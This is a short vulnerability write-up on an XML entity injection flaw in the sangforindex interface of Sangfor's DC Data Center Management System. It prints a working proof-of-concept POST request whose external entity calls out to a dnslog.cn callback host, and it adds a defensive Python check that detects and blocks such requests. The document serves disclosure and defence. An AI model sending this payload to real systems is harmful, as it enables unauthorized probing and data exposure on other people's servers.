Sangfor DC Data Center Management System sangforindex XML Entity Injection Vulnerability
# Sangfor DC Data Center Management System sangforindex XML Entity Injection Vulnerability
Vulnerability Description
The sangforindex interface of the Sangfor DC Data Center Management System has an XML entity injection vulnerability: an attacker can trigger XML entity injection by sending a specially crafted request.
Vulnerability Impact
Sangfor DC Data Center Management System
Network Asset Mapping
Vulnerability Reproduction
Login page
Verification PoC
```http
POST /src/sangforindex HTTP/1.1
Host:
Content-Type: text/xml

<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [
<!ENTITY rootas SYSTEM "https://xgsg1k.dnslog.cn">
]>
<xxx>
&rootas;
</xxx>
```
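A defensive pre-parse check for requests shaped like the one above, added here as an example and not taken from the original post or the vendor's code. It uses Python's expat bindings to list external DTD and entity declarations in a body without fetching anything; `WATCHED_PATH`, `external_refs`, `should_block` and the callback host in the sample are assumptions made for illustration.

```python
import xml.parsers.expat

WATCHED_PATH = "/src/sangforindex"  # endpoint named in the request above


def external_refs(body: bytes):
    """List external DTD/entity declarations in an XML body; nothing is fetched."""
    found = []
    parser = xml.parsers.expat.ParserCreate()

    def on_doctype(name, system_id, public_id, has_internal_subset):
        if system_id or public_id:
            found.append(("doctype", name, system_id))

    def on_entity(name, is_param, value, base, system_id, public_id, notation):
        # Internal entities carry `value`; external ones carry a system/public id.
        if value is None and (system_id or public_id):
            found.append(("parameter-entity" if is_param else "entity", name, system_id))

    parser.StartDoctypeDeclHandler = on_doctype
    parser.EntityDeclHandler = on_entity
    try:
        parser.Parse(body, True)
    except xml.parsers.expat.ExpatError:
        pass  # malformed XML: report what was declared before the error
    return found


def should_block(method: str, path: str, body: bytes) -> bool:
    """True for a POST to the watched path whose body declares an external reference."""
    return (method.upper() == "POST"
            and path.split("?", 1)[0] == WATCHED_PATH
            and bool(external_refs(body)))


# Constructed sample bodies (the callback host is a placeholder, not from the page).
FLAGGED = b"""<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE root [
<!ENTITY rootas SYSTEM "https://callback.example.invalid/">
]>
<xxx>
&rootas;
</xxx>"""
BENIGN = b'<?xml version="1.0" encoding="utf-8" ?><xxx>hello</xxx>'

if __name__ == "__main__":
    for label, body in (("flagged", FLAGGED), ("benign", BENIGN)):
        print(label, should_block("POST", WATCHED_PATH, body), external_refs(body))
```

The same function can be run over captured request bodies in proxy or WAF logs to find earlier attempts against the endpoint.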
This post is licensed under CC BY 4.0 by the author.